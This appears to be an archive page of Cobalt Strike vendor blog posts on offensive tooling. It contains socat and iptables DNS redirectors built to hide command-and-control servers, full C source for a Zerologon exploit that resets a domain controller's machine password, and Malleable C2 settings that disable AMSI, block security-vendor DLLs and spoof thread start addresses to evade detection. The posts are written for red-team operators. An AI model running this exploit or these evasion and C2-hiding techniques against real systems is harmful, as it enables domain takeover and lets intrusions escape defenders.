BOF Archives - Cobalt Strike Research and Development

Simple DNS Redirectors for Cobalt Strike

This post, from Ernesto Alvarez Capandeguy of Core Security’s CoreLabs Research Team, describes techniques used for creating UDP redirectors for protecting Cobalt Strike team servers. This is one of the recommended mechanisms for hiding Cobalt Strike team servers and involves adding different points which a Beacon can contact for instructions when using the HTTP channel.

Unlike HTTP Beacons, DNS Beacons do not contact the team server directly, but use the DNS infrastructure for carrying messages. In theory, the team server should be referenced in the DNS records so that all queries for the Command and Control (C2) domain are delivered properly. This would mean exposing the team server to the Internet, which is not desirable.

Just as HTTP redirectors can be used to hide the team server from outside scrutiny, a DNS redirector can be used for the same thing. In the case of DNS, redirectors are just one part of the solution, as alternative domains are also necessary in case the original domain is taken down. We will not cover these aspects here, as we’ll be concentrating on the redirection part.

Redirecting TCP traffic is straightforward. There is a very delimited set of data that clearly defines what constitutes a network connection (or flow). The state is explicit and can be easily determined from the packet stream. There are several generic proxies (e.g. SOCAT) that can simply proxy TCP connections on the user space. Options for secure proxying of TCP connections are also available (stunnel and SSH port forwarding are two well-known examples).

The situation is radically different for UDP. This is due to a few factors:

  • UDP is packet oriented, while TCP is byte/connection oriented.
  • UDP is stateless and keeping track of UDP “connections” requires second guessing the “connection” state.
  • UDP is handled very differently from TCP in userland.

In a TCP proxy operation, a connection is clearly defined. This connection can transmit EOF messages, so the proxy would always be aware of the state of the connection and would unambiguously know when it should release the connection resources.

UDP is more challenging, since without a way of directly sensing the DNS transaction state, SOCAT cannot know when to release the connection resources.

Simple Redirector Construction

The obvious solution for building a DNS redirector would be to use a DNS server. There are several choices for these, with differing features. We won’t touch on these options in this article, but will instead focus on simple redirectors that can be installed on minimal Linux systems and have a very small footprint.

Our redirectors will be based on the concept of diverting a UDP flow from the redirector’s local port to the team server in a way that the team server has to send the response back to the redirector, which will relay it to the Beacon.

There are two ways of achieving this goal: piping ports together and NAT.

Port Piping

We are all familiar with the concept of piping from a network port. Anyone can do it using netcat or an equivalent tool. Anyone with experience with any of these tools will also know that redirecting UDP traffic is sometimes problematic. A DNS redirector also has these problems, but they can be kept bounded.

For these tests, we are going to use SOCAT, a UNIX tool used to connect multiple types of inputs and outputs together. This tool can do the same thing as netcat but is more versatile.

Naive SOCAT Redirector

Before we jump into the solution, we should try to see the problems. Let’s attempt a naive approach to a DNS channel redirector. We can execute a straight SOCAT, and launch a Beacon pointed to our redirector, which will be executing the following:

# socat udp4-listen:53 udp4:teamserver.example.net:53

The initial installation works, and we see the ghost Beacon in the team server. However, any further communication fails. Monitoring the DNS traffic, we see the following:

# tcpdump -l -n -s 5655 -i eth0  udp port 53
 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
 
05:40:26.453966 IP 173.194.91.156.62931 > redirector.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454317 IP redirector.example.net.56494 > teamserver.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454593 IP teamserver.example.net.53 > redirector.example.net.56494: 55757- 1/0/0 A 0.0.0.0 (100)
05:40:26.454687 IP redirector.example.net.53 > 173.194.91.156.62931: 55757- 1/0/0 A 0.0.0.0 (100)
05:41:26.689753 IP 172.253.219.11.49854 > redirector.example.net.53: 56196% A? 7242b4ba.cobalt-domain.example.net. (51)
05:42:27.217514 IP 172.253.219.11.61868 > redirector.example.net.53: 28170% A? 7242b4ba.cobalt-domain.example.net. (51)
05:43:27.532055 IP 173.194.91.156.49467 > redirector.example.net.53: 59203% A? 7242b4ba.cobalt-domain.example.net. (51)
05:44:27.653780 IP 173.194.91.77.59444 > redirector.example.net.53: 14169% A? 7242b4ba.cobalt-domain.example.net. (51)
05:45:27.770012 IP 173.194.91.141.62374 > redirector.example.net.53: 52473% A? 7242b4ba.cobalt-domain.example.net. (51)
05:46:28.051530 IP 172.253.219.7.39179 > redirector.example.net.53: 26440% A? 7242b4ba.cobalt-domain.example.net. (51)
05:47:28.190316 IP 173.194.91.74.45768 > redirector.example.net.53: 41092% A? 7242b4ba.cobalt-domain.example.net. (51)

Well, the Beacon checked in fine, but after the first DNS request the pipeline stalls. This is because the UDP protocol is stateless. SOCAT never got the idea that the first transaction was over and is still waiting for data from the same source port, ignoring all the others.

This can easily be solved by telling SOCAT to fork for every packet it sees. Below we show our second attempt at doing a SOCAT redirector:

# socat udp4-listen:53,fork udp4:teamserver.example.net:53
 
# tcpdump -l -n -s 5655 -i eth0  udp port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
05:53:45.783953 IP 173.194.91.129.48083 > redirector.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784730 IP redirector.example.net.34472 > teamserver.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784860 IP teamserver.example.net.53 > redirector.example.net.34472: 3962- 1/0/0 A 0.0.0.0 (100)
05:53:45.784954 IP redirector.example.net.53 > 173.194.91.129.48083: 3962- 1/0/0 A 0.0.0.0 (100)
05:54:00.847401 IP 173.194.91.83.48991 > redirector.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848289 IP redirector.example.net.46902 > teamserver.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848436 IP teamserver.example.net.53 > redirector.example.net.46902: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:00.848541 IP redirector.example.net.53 > 173.194.91.83.48991: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:15.917608 IP 173.194.91.156.35560 > redirector.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918490 IP redirector.example.net.55342 > teamserver.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918615 IP teamserver.example.net.53 > redirector.example.net.55342: 29854- 1/0/0 A 0.0.0.0 (100)
05:54:15.918719 IP redirector.example.net.53 > 173.194.91.156.35560: 29854- 1/0/0 A 0.0.0.0 (100)

Our Beacon is now alive and communicating well! SOCAT now waits for packets coming from new sources and forwards them to our team server. While everything appears to be normal, this is unfortunately not the case, as this redirector will not work for long. Let’s inspect the process table:

# ps 
  PID TTY          TIME CMD
5365 pts/0    00:00:00 sudo
5366 pts/0    00:00:00 bash
5864 pts/0    00:00:00 socat
5865 pts/0    00:00:00 socat
5866 pts/0    00:00:00 socat
5867 pts/0    00:00:00 socat
5868 pts/0    00:00:00 socat
5869 pts/0    00:00:00 socat
5870 pts/0    00:00:00 socat
5871 pts/0    00:00:00 socat
5883 pts/0    00:00:00 socat
5886 pts/0    00:00:00 socat
5888 pts/0    00:00:00 socat
5889 pts/0    00:00:00 socat
5890 pts/0    00:00:00 socat
5891 pts/0    00:00:00 socat
5903 pts/0    00:00:00 socat
5904 pts/0    00:00:00 socat
5908 pts/0    00:00:00 socat
5910 pts/0    00:00:00 socat
5911 pts/0    00:00:00 socat
5912 pts/0    00:00:00 socat
5913 pts/0    00:00:00 socat
5914 pts/0    00:00:00 socat
5923 pts/0    00:00:00 ps

This does not look good. SOCAT processes are piling up. Let’s stress the redirector a bit by requesting a few screenshots and then check the process table:

# ps | grep socat | wc -l
3489

If we weren’t root, we would have run out of process slots long ago. Even the superuser will eventually have problems with this redirector:

socat udp4-listen:53,fork udp4:teamserver.example.net:53
2021/03/02 06:09:57 socat[5864] E fork(): Resource temporarily unavailable

As expected, we ran out of resources. Worse, we still have several thousand SOCAT processes waiting. The problem was caused because SOCAT does not notice that a transaction has run out, and still keeps its resources allocated.

Working UDP SOCAT Redirector

Now that we understand the problems involving UDP proxying, we can build a functional solution. The trick is telling SOCAT to drop the connections as soon as the transaction is complete. Telling SOCAT to apply a 5 second inactivity timeout should do the trick:

 # socat -T 5 udp4-listen:53,fork udp4:teamserver.example.net:53

In the example above, we told SOCAT that if no data is seen for five seconds, it should close the socket and assume that no further communication is needed.

While five seconds is a reasonable default timeout, we can attempt to optimize this value. To fine tune the timeout, we should understand the problem we’re facing. A DNS request is sent to our reflector, which is relayed to the team server. Once the team server answers, the transaction is over.

This limits our timeout to something we can control: the round-trip time between the redirector and the team server, including the time needed to process the request. A reasonable value would be twice the RTT between the hosts, to have some safety margin. Since our test hosts are in the same LAN, a timeout of one second should be more than enough for our example.

Below we show the process usage for five and one second timeouts:

The graph shows that the number of SOCAT processes rises as soon as there is activity, but the timeout causes the number of active processes to reach a plateau and stay at a certain value, depending on the activity and the timeout.

Working SOCAT UDP/TCP Redirector

We now have a working redirector. We can also use SOCAT for UDP to TCP translation. For every UDP packet received, we can fork and open a TCP connection, sending the DNS data via TCP. It is very important not to recycle connections, because UDP is packet oriented while TCP is not. We should never put more than one packet within a TCP connection, because two packets might be joined or split. In theory, SOCAT might decide to split a DNS request in two UDP packets, but this does not happen in practice. You should know that there is always that risk when doing UDP to TCP translations.

We tell SOCAT to take traffic from port 53, and for each packet, to open a connection to port 9191/tcp on the team server. The timeout is set to one second, which might be a bit too low, considering that TCP is involved:

# socat -T 1 udp4-listen:53,fork tcp4:teamserver.example.net:9191

Since we’re encapsulating our data within TCP, we need to run the following in the team server:

# socat -T 10 tcp4-listen:9191,fork udp4:127.0.0.1:53

Let’s now try generating some traffic and see what happens.

The dip in the middle represents a lapse in activity. The quick timeout allows for fast recovery. Overall, it’s not bad, but we also need to see how many open connections we have.

The numbers are somewhat high because TCP requires a wait period when a connection is closed from the client side. This is needed in case some control messages are lost and should not be removed for the protocol to operate properly. This is not a problem, though, because the number of resources allocated reach an equilibrium. A few RTT after the activity goes down, the resource usage drops as well.

Once we have the translation capability, we can take advantage of it. With DNS over TCP connections, we can take advantage of other proxying utilities, like stunnel or SSH’s port forwarding, and attempt to hide the team server from public scrutiny. The team server can be kept in an isolated network, without being exposed to the Internet.

NAT Based Redirectors

Another possible solution involves NAT. The concept behind a NAT redirector is to apply two NAT operations to incoming packets. The packet must be redirected to the team server, but at the same time, the packet must also be translated so that it appears to come from the redirector.

Failing to apply the second operation will cause the team server to answer the DNS query itself. The response will be ignored, as it will come from a different DNS server.

For our NAT redirector, we use Linux’s IPTABLES.

IPTABLES Based Redirector

IPTABLES is also well suited for use as a redirector. The Linux kernel’s NAT system automatically keeps track of connection state, even for UDP traffic. The detection is based on timers and inactivity, but the system is well developed and very stable.

The advantage of IPTABLES redirectors is that they’re lightning fast, incredibly efficient, and robust. Unlike SOCAT redirectors, iptables cannot convert from one protocol to another as IPTABLES works by packet mangling.

To create a working redirector, two things need to happen at the same time. Once a DNS query reaches the redirector, it must be redirected to the team server. This requires a DNAT operation.

However, if DNAT is used alone the packet will be diverted without changing the source address. As we already explained, this is not a good result, so we’ll also need to execute a SNAT operation.

The decision for doing the double NAT needs to be taken before any of the operations take place, as the DNAT change in the PREROUTING rule will erase important information present in the packet (namely whether this packet is addressed to the redirector or not).

To execute both operations simultaneously, we call the MARK target in the PREROUTING chain, and match the packet using every parameter of interest. Once the packet is marked, we can apply all operations both in the PREROUTING and POSTROUTING chains, completely changing the packet.

One final detail is that IP forwarding must be enabled in the redirector, since all these operations count as a forward, even if the packet is sent through the same interface it came in.

In the end, there are four commands that need to be called:

#enable IP forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward

#Mark incoming DNS packets with the tag 0x400
iptables -t nat -A PREROUTING -m state --state NEW --protocol udp --destination my.ip.address 
--destination-port 53 -j MARK --set-mark 0x400

#For every marked packet, apply a DNAT and a SNAT (in this case, a MASQUERADE)
iptables -t nat -A PREROUTING -m mark --mark 0x400 --protocol udp 
-j DNAT --to-destination teamserver.example.net:53
iptables -t nat -A POSTROUTING -m mark --mark 0x400 -j MASQUERADE

Evaluating the capabilities listed in the proc filesystem, we see that we have 65,536 entries in the translation table (proc/sys/net/netfilter/nf_conntrack_max), and 16,384 buckets (/proc/sys/net/netfilter/nf_conntrack_buckets). This indicates that even at peak capacity, the lookups should be quick. These are default values and can be easily changed by writing a new number to the file, if necessary.

The system keeps track of the traffic passing through the redirector, so no action is needed for returning packets since they are translated back automatically.

To evaluate the performance of the redirector, we can measure the number of active NAT entries and how this number changes as the system is loaded. To measure this, we can read /proc/sys/net/netfilter/nf_conntrack_count.

Our experiment starts with a Beacon signaling at 15 second intervals. The Beacon is then made to signal continuously, followed by a high activity period. Once this activity period is over, the Beacon is reconfigured to its initial value of 15 seconds between polls.

In the test above we can see that the number of occupied slots depends on the network activity. With just one Beacon polling at 15 second intervals, the amount of conntrack slots is less than 10. If we switch to no delay, the value quickly grows to about 500, depending on availability throughput. When heavy activity is requested, the connection states steadily rise to 2500 and plateaus at 2700. Once activity ceases, connection tracks decrease until around 90 seconds, at which point they are all expired and the value stabilizes below 10.

IPTABLES redirectors perform quite well with very modest resources, even with default settings. This is not surprising, given the nature of the Linux kernel. Redirectors like this one can easily be deployed on the smallest computers or cloud instances. IPTABLES redirectors, once set up, are pretty much foolproof.

Summary

In this article, we saw three different implementations of DNS Beacon redirectors. Though these implementations have different advantages and disadvantages,  they are ultimately all very usable.

The IPTABLES based redirector is the quickest with the smallest footprint, being included by default in the kernel, and needing just four commands.

The SOCAT based redirectors are similar, the main difference being whether traffic is converted to TCP or not. UDP redirectors are simplest, but TCP redirectors have an advantage in the sense that TCP connections are easier to encapsulate, which is an advantage in special cases, like when the traffic must be tunneled via SSH.

Resource usage Speed Versatility Ease of Use Stability
SOCAT TCP 0 ++ + 0
SOCAT UDP + + + ++ +
IPTABLES ++ ++ 0 ++ ++

 

Beacon Object File ADVENTURES: Some Zerologon, SMBGhost, and Situational Awareness

Cobalt Strike can use PowerShell, .NET, and Reflective DLLs for its post-exploitation features. This is the weaponization problem set. How to take things, developed outside the tool, and create a path to use them in the tool. One of the newest weaponization options in Cobalt Strike are Beacon Object Files.

A Beacon Object File is a tiny C program that is compiled as an object and parsed, linked, and executed by Cobalt Strike’s Beacon payload. The value of Beacon Object Files is that they’re small, they have less execution baggage than the other methods (e.g., no fork and run), and they’re not that bad to develop either.

In this post, I’d like to share with you a few examples of how to extend Cobalt Strike with Beacon Object Files.

CVE-2020-1472 (aka Zerologon)

Let’s start with CVE-2020-1472, aka the Zerologon exploit. This is an opportunity to remotely attack and gain privileged credential material from an unpatched Windows Domain Controller.

This is a risky attack to carry out. It resets the machine account password for the target domain controller. This will break the domain controller’s functionality. I would limit use of this capability to demonstrations in a snapshotted lab or red vs. blue wargames in a snapshotted lab. I would not use this in production.

Secura, the company that discovered the bug, documents the details of the attack and weaponization chains in their whitepaper. Rich Warren from NCC Group’s Full Spectrum Attack Simulation team published a .NET program that executes this attack too.

While .NET is one path to an exploit, this same capability is a natural fit for a C program too. Here’s the Beacon Object File to exploit CVE-2020-1472 and an Aggressor Script to integrate it into Cobalt Strike:

/*
* Port of SharpZeroLogon to a Beacon Object File
* https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon
*/

#include <windows.h>
#include <stdio.h>
#include <dsgetdc.h>
#include "beacon.h"

typedef struct _NETLOGON_CREDENTIAL {
CHAR data[8];
} NETLOGON_CREDENTIAL, *PNETLOGON_CREDENTIAL;

typedef struct _NETLOGON_AUTHENTICATOR {
NETLOGON_CREDENTIAL Credential;
DWORD Timestamp;
} NETLOGON_AUTHENTICATOR, *PNETLOGON_AUTHENTICATOR;

typedef  enum _NETLOGON_SECURE_CHANNEL_TYPE{
NullSecureChannel = 0,
MsvApSecureChannel = 1,
WorkstationSecureChannel = 2,
TrustedDnsDomainSecureChannel = 3,
TrustedDomainSecureChannel = 4,
UasServerSecureChannel = 5,
ServerSecureChannel = 6,
CdcServerSecureChannel = 7
} NETLOGON_SECURE_CHANNEL_TYPE;

typedef struct _NL_TRUST_PASSWORD {
WCHAR Buffer[256];
ULONG Length;
} NL_TRUST_PASSWORD, *PNL_TRUST_PASSWORD;

DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerReqChallenge(LPWSTR PrimaryName, LPWSTR ComputerName, PNETLOGON_CREDENTIAL ClientChallenge, PNETLOGON_CREDENTIAL ServerChallenge);
DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerAuthenticate2(LPWSTR PrimaryName, LPWSTR AccountName, NETLOGON_SECURE_CHANNEL_TYPE AccountType, LPWSTR ComputerName, PNETLOGON_CREDENTIAL ClientCredential, PNETLOGON_CREDENTIAL ServerCredential, PULONG NegotiatedFlags);
DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerPasswordSet2(LPWSTR PrimaryName, LPWSTR AccountName, NETLOGON_SECURE_CHANNEL_TYPE AccountType, LPWSTR ComputerName, PNETLOGON_AUTHENTICATOR Authenticator, PNETLOGON_AUTHENTICATOR ReturnAuthenticator, PNL_TRUST_PASSWORD ClearNewPassword);

void go(char * args, int alen) {
DWORD                  i;
NETLOGON_CREDENTIAL    ClientCh       = {0};
NETLOGON_CREDENTIAL    ServerCh       = {0};
NETLOGON_AUTHENTICATOR Auth           = {0};
NETLOGON_AUTHENTICATOR AuthRet        = {0};
NL_TRUST_PASSWORD      NewPass        = {0};
ULONG                  NegotiateFlags = 0x212fffff;

datap                  parser;
wchar_t *              dc_fqdn;     /* DC.corp.acme.com */
wchar_t *              dc_netbios;  /* DC */
wchar_t *              dc_account;  /* DC$ */

/* extract our arguments */
BeaconDataParse(&parser, args, alen);
dc_fqdn    = (wchar_t *)BeaconDataExtract(&parser, NULL);
dc_netbios = (wchar_t *)BeaconDataExtract(&parser, NULL);
dc_account = (wchar_t *)BeaconDataExtract(&parser, NULL);

for (i = 0; i < 2000; i++) {
NETAPI32$I_NetServerReqChallenge(dc_fqdn, dc_netbios, &ClientCh, &ServerCh);
if ((NETAPI32$I_NetServerAuthenticate2(dc_fqdn, dc_account, ServerSecureChannel, dc_netbios, &ClientCh, &ServerCh, &NegotiateFlags) == 0)) {
if (NETAPI32$I_NetServerPasswordSet2(dc_fqdn, dc_account, ServerSecureChannel, dc_netbios, &Auth, &AuthRet, &NewPass) == 0) {
BeaconPrintf(CALLBACK_OUTPUT, "Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync", dc_account);
}
else {
BeaconPrintf(CALLBACK_ERROR, "Failed to set machine account pass for %S", dc_account);
}

return;
}
}

BeaconPrintf(CALLBACK_ERROR, "%S is not vulnerable", dc_fqdn);
}

I’ve recorded a demonstration of this attack chain as well:

The above is a good example of a Beacon Object File that implements an of-interest attack. I’ll add that Benjamin Delpy has also added ZeroLogon to mimikatz. I like that he’s extended the options for dcsync to authenticate to a domain controller with the blank credential. This is a cleaner overall attack chain as we run mimikatz once and get the desired outcome. The same “you’ll wreck this DC” caveats apply. That said, the mimikatz implementation is what I’d use going forward.

CVE-2020-0796 (aka SMBGhost)

Another cool exploit is CVE-2020-0796, aka the SMBGhost exploit. This is an escalation of privilege opportunity against an unpatched Windows 10 system.

Core Impact has an implementation of this attack. So does the Metasploit Framework. The Metasploit Framework implementation, based on the POC from Garcia Gutierrez and Blanco Parajon, is compiled as a Reflective DLL. Cobalt Strike is able to use this implementation as-is and I demonstrate this in the Elevate Kit. The privilege escalation lecture of our Red Team Operations with Cobalt Strike course covers this pattern.

What about weaponizing CVE-2020-0796 as a Beacon Object File? This is also pretty easy to do. I found that this exploit was a very straight-forward move from Metasploit’s Reflective DLL implementation to BOF. I posted the BOF code for SMBGhost to Github with an Aggressor Script too. The README.txt documents some of the steps I took as well.


What’s neat about this implementation is that it offers two paths to use this exploit. The first path spawns a session and integrates with Beacon’s elevate (elevate smbghost) command. The exploit itself modified our current process’ token, allowing it to do some privileged things from the current context. This first weaponization path uses these semi-enhanced privileges to inject a payload into winlogon.exe.

The second path, implemented as an smbghost alias, exploits the vulnerability, yields the slightly enhanced privileges, and lets you choose what to do with it. This second path is very much Bring Your Own Weaponization 🙂 I want to re-emphasize the some privileges limitation. The token manipulation, made possible by this exploit, allows us to get away with opening/interacting with processes in the same session–where we couldn’t before. The second step of injecting into a privileged process (or spawning a process under a privileged process) is required to cleanly take on a fully privileged context to work from.

Windows Reconaissance Tools

The above Beacon Object Files are examples I’ve cobbled together. One of my favorite examples of Beacon Object Files come from Christopher Paschen at TrustedSec. Christopher wrote about his experiences with Beacon Object Files in A Developer’s Introduction to Beacon Object Files.

TrustedSec also published a collection of Beacon Object Files (and scripts to integrate them) on Github. The collection is awesome, by the way!

The collection includes several system reconaissance commands that would normally use Cobalt Strike’s fork&run pattern or require you to spawn an external process to get information. It’s a great example of what BOFs enable in this toolset.

To use the collection, simply clone the repository onto your Cobalt Strike system. Then go to Cobalt Strike -> Scripts in Cobalt Strike. Press Load. And navigate to the SA folder (from this repository) and load SA.cna. You will suddenly have a bunch of new aliases you can use from Beacon.

Closing Thoughts…

I hope you’ve enjoyed this tour of Beacon Object Files. If you have working C code for a post-exploitation concept, Beacon Object Files are a path to turn that C code into something that can work from Cobalt Strike. If you want to see another perspective on this process, watch the Cobalt Strike BOF Making episode (14:45 is the start of this discussion) of the HackThePlanet twitch stream. I also wanted to highlight that there’s some great Beacon Object File capability available in the open source space too. Enjoy!

Cobalt Strike 3.14 – Post-Ex Omakase Shimasu

Cobalt Strike 3.14 is now available. This release benefits the OPSEC of Beacon’s post-exploitation jobs. To take a screenshot, log keystrokes, dump credentials, or scan for targets: Beacon often spawns a temporary process, injects the capability into it, and receives results over a pipe. While Cobalt Strike has a lot of flexibility around launching temporary processes, it has had too few options for the actions that come next. This release changes that.

Malleable Process Injection, pt. 2

It makes sense to start this discussion with process injection. This is a key part of Beacon’s post-exploitation attack chain. The process injection code-path in Beacon is some of the oldest code in the payload and it was originally designed to “just work” in the myriad of corner cases this offense technique requires. These corner cases are not trivial. x86 -> x86, x86 -> x64, x64 -> x86, and x64 -> x64 in both suspended and not suspended processes are cases that a process-injection implementation needs to account for. The above becomes more complicated as some options fail across desktop session boundaries and others are riskier on older Windows XP-era systems. You can say “I don’t care about Windows XP”, and to some extent I don’t either, but Cobalt Strike’s Beacon circa 2012 had to cope with this.

Cobalt Strike 3.12 made some progress on process injection flexibility. This release picks up where 3.12 left off. Here’s what it looks like:

process-inject {
# set remote memory allocation technique
set allocator "NtMapViewOfSection";

# shape the content and properties of what we will inject
set min_alloc "16384";
set userwx    "false";

transform-x86 {
prepend "\x90";
}

transform-x64 {
prepend "\x90";
}

# specify how we execute code in the remote process
execute {
CreateThread "ntdll!RtlUserThreadStart";
CreateThread;
NtQueueApcThread-s;
CreateRemoteThread;
RtlCreateUserThread;
}
}

Remote Memory Allocation

The process-inject -> allocator Malleable C2 option presents two paths to allocate memory within and copy data to a remote process.

The default VirtualAllocEx uses the venerable VirtualAllocEx -> WriteProcessMemory combination. The NtMapViewOfSection option has Beacon create a file mapping in the current process, copy the code to this local section, and map it into the remote process with NtMapViewOfSection. This option is limited to same-architecture target process (VirtualAllocEx is always the fallback).

Code Execution

3.14 also offers control over which techniques Beacon uses to execute code in a remote process and in which order it attempts them. This is done with the process-inject -> execute block. When executing code in a remote process: Beacon examines each option in the execute block, determines if the option is fair game for the current context, tries it if it’s relevant, and stops this process if code execution was successful.

Cobalt Strike’s options include:

  • CreateThread
  • CreateThread “module!Function+0x##”
  • CreateRemoteThread
  • CreateRemoteThread “module!Function+0x##”
  • NtQueueApcThread
  • NtQueueApcThread-s
  • RtlCreateUserThread
  • SetThreadContext

The CreateThread option is specific to self-injection.

The SetThreadContext and NtQueueApcThread-s options are specific to the temporary processes Beacon launches for its post-exploitation jobs. These functions take over the main thread of the suspended process and use it to execute the injected post-exploitation capability. The NtQueueApcThread-s option is Cobalt Strike’s implementation of the so-called Early Bird technique.

NtQueueApcThread, RtlCreateUserThread, and CreateRemoteThread are standard-issue options to inject code into a remote process. The RtlCreateUserThread option has an implementation variant for x86 -> x64 injection. CreateRemoteThread and RtlCreateUserThread both handle x64 -> x86 injection. All other options cover x86 -> x86 and x64 -> x64 injection.

CreateThread and CreateRemoteThread have variants that spawn a thread with the address fo another function, update the suspended thread to execute our code, and then resume the thread. This is useful to duck past techniques like Get-InjectedThread. Use [function] “module!function+0x##” to specify the start address to spoof. For remote processes, ntdll and kernel32 are the only recommended modules to pull from. The optional 0x## part is an offset added to the start address.

With the execute block, you may arrange these functions in an order of preference you’d like to use in your operations. It’s OK to omit or include options to tailor Beacon’s behavior to the adversary capability you’d like to emulate.

Revised Post-exploitation DLLs

Cobalt Strike 3.14 adds a post-ex block to Malleable C2. This block collects options to tweak the content and behavior of the post-exploitation jobs in Cobalt Strike.

post-ex {
# control the temporary process we spawn to
set spawnto_x86 "%windir%\\syswow64\\WerFault.exe";
set spawnto_x64 "%windir%\\sysnative\\WerFault.exe";

# change the permissions and content of our post-ex DLLs
set obfuscate "true";

# pass key function pointers from Beacon to its child jobs
set smartinject "true";

# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";
}

Existing options such as spawnto_x86, spawnto_x64, and amsi_disable were moved to the post-ex block.

The obfuscate option scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way. It’s very similar to the obfuscate and userwx options available for Beacon via the stage block.

The smartinject option directs Beacon to embed key function pointers, like GetProcAddress and LoadLibrary, into its same-architecture post-ex DLLs. This allows post-ex DLLs to bootstrap themselves in a new process without shellcode-like behavior that is detected and mitigated by watching memory reads of the export address table in kernel32 and friends.

Blocking Vendor DLLs

Process injection does not exist in Windows solely to enable offense software. Some security products inject DLLs into user processes too. They do this to get deeper visibility into and veto power over the activities of the process. This is accomplished by hooking functions associated with common offense techniques.

Related: Google found that Chrome users were 15% more likely to experience a crash when injected code is present in the Chrome process space. Google decided to push back and block these DLLs from the Chrome process space. As an offense engineer, I thought it would benefit my processes if I could ALSO block these unwanted third-party DLLs from my processes. It turns out… this is possible.

Use blockdlls start and Cobalt Strike will launch child processes in a way that denies third-party DLLs access to the same process space. This is accomplished by running the process with a binary security policy attribute that restricts DLL loads to Microsoft-signed DLLs only. This is an option present in Windows 10 since late-2017.

Revised Process and File Browser Tabs

The 3.14 process browser now organizes the process information into a tree. Highlight a process in the tree and it will immediately highlight in the right-side detailed view of the processes. Your current process also shows in yellow. This is a lot easier than trying to follow a flat ps output and figure out which process is the parent of which process:

The 3.14 file browser is now (slightly) friendlier to Beacon’s asynchronous communication style. Each file browser now caches the folder/file listings it has seen. A tree on the left-hand side of the file browser shows which known folders are in the cache and which are not. Colored folders are in the cache. Grey folders are not. Click on an uncached folder in the tree and the file browser will ask Beacon to list that folder on its next check-in. In this way, you can revisit folders you’ve already seen, request multiple folders, and queue up multiple actions (e.g., download, execute, delete) in between Beacon checkins.

These changes should make post-exploitation a little more fun.

Check out the release notes to see a full list of what’s new in Cobalt Strike 3.14. Licensed users may use the update program to get the latest.

Beware of Slow Downloads

I often receive emails that ask about slow file downloads with the Beacon payload. Here are the symptoms:

  • It takes multiple hours to grab a few megabytes
  • The sleep time makes no difference
  • File uploads are fast and not affected by this “slowness”

When I get these emails, I usually ask the user about their Malleable C2 profile. Malleable C2 is a technology to change the network and memory indicators for Cobalt Strike’s Beacon payload. In some cases, it can alter the tool’s behavior too.

I sometimes get a reply that the operator is using a custom profile derived from one of the Malleable C2 profiles on my Github repository. Inevitably, I’ll learn that the base profile is a profile that uses HTTP GET requests to download tasks from AND send data back to Cobalt Strike’s team server.

Cobalt Strike’s Beacon payload downloads tasks from its team server via an HTTP GET (or POST) request. The payload limits itself to 1MB of encrypted data per request. This is enough to download most task packages in one request.

By default, Cobalt Strike’s Beacon payload sends data back to Cobalt Strike’s team server with an HTTP POST request. In this default, the Beacon payload embeds its encrypted data into the body of the POST request. Here, the limit is again, 1MB. If you’re downloading a file, Beacon will deliver it in 512KB pieces. This 1MB limit is enough to send a 512KB file piece and some output in one HTTP POST request.

The default is what most Cobalt Strike users are used to and it’s the behavior most Cobalt Strike users expect when they use the HTTP and HTTPS Beacon payloads.

Cobalt Strike 3.6 extended Malleable C2 to allow operators to change where, in the HTTP request, Beacon embeds data it sends back to the team server. The default is still to embed data into the body of an HTTP POST request. But, you also have the flexibility to embed Beacon’s data into the URI, an HTTP header, or a URI parameter. You can also change the HTTP verb associated with this request too. This is amazing flexibility to put into an operator’s hands.

The above flexibility has consequences though. I can stick 1MB of data into the body of an HTTP POST request, no problem. I can’t stick 1MB of data into a URI, an HTTP header, or a URI parameter. That won’t work. What does Cobalt Strike’s Beacon do in these situations? Beacon chunks its output.

The chunker will divide any data, destined for the team server, into ~100 byte chunks. Each piece is sent back to the team server in its own HTTP request. This is where the behavior change comes.

I can send a 512KB file piece in the body of one HTTP POST request. That same file piece requires over 5,240 HTTP requests when divided into 100 byte chunks. Beacon does not make these HTTP requests in parallel. Rather, it makes one request, and waits for the response. It then makes the second request and waits for its response. This happens until all needed HTTP requests are made. The latency associated with each request is the thing that affects your download speed.

If you’ve seen this behavior in your use of Cobalt Strike, I hope this blog post helps clarify why you’re seeing it.

OPSEC Considerations for Beacon Commands

Update January 9, 2020 – This topic is now part of the Cobalt Strike documentation. Head over to the Beacon Command Behavior page for the latest version of this information.

A good operator knows their tools and has an idea of how the tool is accomplishing its objectives on their behalf. This blog post surveys Beacons commands and provides background on which commands inject into remote processes, which commands spawn jobs, and which commands rely on cmd.exe or powershell.exe.

API-only

These commands are built-into Beacon and rely on Win32 APIs to meet their objectives.

cd
cp
download
drives
exit
getprivs
getuid
kerberos_ccache_use
kerberos_ticket_purge
kerberos_ticket_use
jobkill
kill
link
ls
make_token
mkdir
mv
ppid
ps
pwd
reg query
reg queryv
rev2self
rm
rportfwd
setenv
socks
steal_token
timestomp
unlink
upload

House-keeping Commands

